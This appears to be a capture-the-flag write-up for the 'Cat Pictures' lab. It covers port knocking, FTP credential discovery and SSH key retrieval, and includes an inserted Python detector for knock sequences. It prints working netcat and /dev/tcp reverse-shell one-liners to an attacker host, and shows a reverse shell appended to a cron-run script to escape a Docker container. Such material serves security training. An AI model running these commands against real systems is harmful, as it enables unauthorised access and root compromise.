# Cat Pictures

## Nmap

```
sudo nmap 10.10.217.166 -p- -sS -sV

PORT     STATE    SERVICE      VERSION
21/tcp   filtered ftp
22/tcp   open     ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
2375/tcp filtered docker
4420/tcp open     nvm-express?
8080/tcp open     http         Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1d PHP/7.3.27)
```

Interestingly, `Nmap` shows that port 21 is filtered, which we can take note of. Running netcat against port 4420 appears to show a login prompt for a shell. Unfortunately I was unable to proceed by attempting common passwords.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2e3d99affc22896e651d66c45d20e12220f6f1bf%2Fimage.png?alt=media)

Over on port 8080 we have a landing page for phpBB forums.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-b7d1cb7f41fbe669fed4161fba5b13c05c9b62b5%2Fimage.png?alt=media)

From here I tried to register an account and was unsuccessful due to an 'Invalid MX domain' error.

Looking at the only thread created by the site admin we see a potential reference to port knocking.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a381e617f330d9b1110070b48dfc1591296da180%2Fimage.png?alt=media)

We can perform port knocking as per the bash command below, which uses Nmap to 'knock' the ports in sequence. Once complete, scanning the target's ports again should show one of them open.

```bash
for i in 1111 2222 3333 4444;do nmap -Pn -p $i --host-timeout 201 --max-retries 0 <IP>; done
```

```
sudo nmap 10.10.217.166 -F -sS

PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   open     ssh
53/tcp   filtered domain
8080/tcp open     http-proxy
```
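From the defender's side, the knock sequence above is visible in firewall logs as a fixed ordering of SYNs from one source. The following detector is an added example (not part of the original writeup) that runs over constructed netfilter-style LOG lines and flags any source that completes the 1111, 2222, 3333, 4444 sequence in order; the log format, hostnames and timestamps are assumptions.

```python
import re
from collections import defaultdict

# Knock sequence taken from the forum hint in the writeup.
KNOCK_SEQUENCE = (1111, 2222, 3333, 4444)

# Extracts the SRC= and DPT= fields of a netfilter LOG line.
LOG_RE = re.compile(r"SRC=(?P<src>\S+).*?DPT=(?P<dpt>\d+)")

# Constructed sample log (assumed format, not captured from the target):
# one source knocks in order then hits FTP, another hits the same ports out of order.
SAMPLE_LOG = """\
Jan 10 12:00:01 host kernel: FW IN=eth0 SRC=10.11.39.30 DST=10.10.217.166 PROTO=TCP DPT=1111
Jan 10 12:00:02 host kernel: FW IN=eth0 SRC=10.11.39.30 DST=10.10.217.166 PROTO=TCP DPT=2222
Jan 10 12:00:03 host kernel: FW IN=eth0 SRC=10.11.39.30 DST=10.10.217.166 PROTO=TCP DPT=3333
Jan 10 12:00:04 host kernel: FW IN=eth0 SRC=10.11.39.30 DST=10.10.217.166 PROTO=TCP DPT=4444
Jan 10 12:00:05 host kernel: FW IN=eth0 SRC=10.11.39.30 DST=10.10.217.166 PROTO=TCP DPT=21
Jan 10 12:00:06 host kernel: FW IN=eth0 SRC=192.0.2.7 DST=10.10.217.166 PROTO=TCP DPT=2222
Jan 10 12:00:07 host kernel: FW IN=eth0 SRC=192.0.2.7 DST=10.10.217.166 PROTO=TCP DPT=1111
Jan 10 12:00:08 host kernel: FW IN=eth0 SRC=192.0.2.7 DST=10.10.217.166 PROTO=TCP DPT=3333
Jan 10 12:00:09 host kernel: FW IN=eth0 SRC=192.0.2.7 DST=10.10.217.166 PROTO=TCP DPT=4444
"""

def find_knock_completions(log_text, sequence=KNOCK_SEQUENCE):
    """Return {src_ip: count} for sources that sent the whole sequence in order.

    A packet to the expected port advances that source's position; any other
    port resets it (restarting at 1 if it was the first knock), which mirrors
    how a knockd-style daemon tracks progress per client."""
    position = defaultdict(int)
    completions = defaultdict(int)
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        src, dpt = m.group("src"), int(m.group("dpt"))
        if dpt == sequence[position[src]]:
            position[src] += 1
            if position[src] == len(sequence):
                completions[src] += 1
                position[src] = 0
        else:
            position[src] = 1 if dpt == sequence[0] else 0
    return dict(completions)

def alerts(log_text):
    """Human-readable alert lines, one per source that completed the sequence."""
    return [f"port-knock sequence completed by {src}"
            for src in sorted(find_knock_completions(log_text))]
```

Only the in-order source is reported; the out-of-order one never reaches the final knock, just as the real knock daemon would not open port 21 for it.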

We can now connect to the FTP.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6bdd7f7846707580fc8c98d241835d6785c5880c%2Fimage.png?alt=media)

Reading the contents of note.txt we are given the internal shell password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6bd2b9dbcd8e0c6cabb9c61bdd186f8b3c4d5f67%2Fimage.png?alt=media)

After entering the password over `netcat` to port 4420 we now appear to have access to the target system.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-165323bd6df232c56a9e3b3724b0d1d956bafaaa%2Fimage.png?alt=media)

From here I checked the installed software under /bin/ and found `netcat` to be installed. As such, I opted to get a more usable `netcat` reverse shell.

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <Port> >/tmp/f
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6543699a48b492d5e23d3491ed3b2dbb2dada0db%2Fimage.png?alt=media)

From here, checking the home directory contents, we see that the user catlover has a file called runme in their home directory.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-26d3fb277ae81b9e779a6679c3b3e2421e5da765%2Fimage.png?alt=media)

When running the file we are asked for a password to proceed. I tried the shell service password, which was incorrect. From here I ran cat on the file to view its contents and noticed the string 'rebecca' just before the output asking for a password.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6b222f788b6158f37d21ba59294e8205e8a3c019%2Fimage.png?alt=media)

Entering rebecca as the password, we are then given the message '*Welcome, catlover! SSH key transfer queued!*'.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fdf53145dd4e8ed0e531b1001878349e7520ae12%2Fimage.png?alt=media)

After a short while, id\_rsa will appear in the user's home directory.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a6ac8388c80425253bcab9b16b0b97e47c8e2a92%2Fimage.png?alt=media)

After transferring the contents of id\_rsa to my attacking machine, I used the following `chmod` command to set the correct permissions on the key.

```bash
chmod 600 cat_rsa
```

We are then able to `SSH` in as the known user on the target machine.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-59f96cd38c0d48382101cf80c7738129a3755278%2Fimage.png?alt=media)

We appear to be root. However, given the machine hostname of 7546fa2336d6 and the existence of the .dockerenv file in '/', we are more than likely inside a Docker container.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-138b7587695db608b551490b30e5d9c9db18c91e%2Fimage.png?alt=media)

From here I noticed a file at /opt/clean.sh. Viewing its contents, it looks like it removes the contents of the /tmp/ directory. I placed some files in that directory and waited; after a short while they had been removed, confirming that the script is being run on a schedule.

As a result, I appended a bash reverse shell to clean.sh.

```bash
echo '0<&196;exec 196<>/dev/tcp/10.11.39.30/4422; sh <&196 >&196 2>&196' >> clean.sh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5e0a9337c4613859c8d019e00c927f19a4e0887%2Fimage.png?alt=media)

We soon receive a reverse shell as root outside the Docker container.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9583e83c4dd25dba4c4e3fee617325bfa8093407%2Fimage.png?alt=media)
